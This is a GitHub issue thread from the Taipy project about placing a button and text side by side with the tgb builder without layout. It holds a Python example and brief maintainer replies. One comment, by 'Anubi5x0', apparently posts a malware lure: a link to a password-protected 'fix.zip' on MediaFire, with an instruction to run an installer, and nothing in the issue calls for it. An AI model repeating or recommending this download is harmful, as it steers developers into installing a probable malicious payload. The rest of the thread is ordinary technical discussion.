### ISSUE TITLE
Unable to arrange elements like buttons side-by-side without layout when using tgb

### ISSUE THREAD

**Issue by arcanaxion** [Avaiga/taipy#1725]
### Description

I can write text next to a button like so using the taipy md syntax:

```python
from taipy.gui import Gui, Markdown
import taipy.gui.builder as tgb


with tgb.Page() as page_tgb:
    tgb.button(label="Click me")
    tgb.text("This is a button", mode="md")

page_md = Markdown(
"""
<|Click me|button|> This is a button
""")

if __name__ == "__main__":
    page = page_tgb
    gui = Gui(page)
    gui.run(debug=True, run_browser=False, use_reloader=True)
```

Which gives this:

![unnamed](https://github.com/user-attachments/assets/82a13e71-2623-417b-b6aa-e89a8411e83a)

Can I do the same with the taipy gui builder // python syntax without using layout?

### Acceptance Criteria

- [ ] Ensure new code is unit tested, and check code coverage is at least 90%.
- [ ] Propagate any change on the demos and run all of them to ensure there is no breaking change.
- [ ] Ensure any change is well documented.

### Code of Conduct

- [X] I have checked the [existing issues](https://github.com/Avaiga/taipy/issues?q=is%3Aissue+).
- [ ] I am willing to work on this issue (optional)

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dinhlongviolin1** [comment]
@FabienLelaquais we could make an option so it will generate as an inline or an inline-block

**Comment by arcanaxion** [comment]
Related topic for discussion: Would it be possible to have this side-by-side behaviour for cards? Currently, I don't think is possible using the Taipy Markdown or tgb APIs. This feature would pair great with the change in #468.

**Comment by dinhlongviolin1** [comment]
@arcanaxion can you write a demo use case that you have in tgb. I can have a look at it for you. Please create a new issue on that and tag me in the issue.
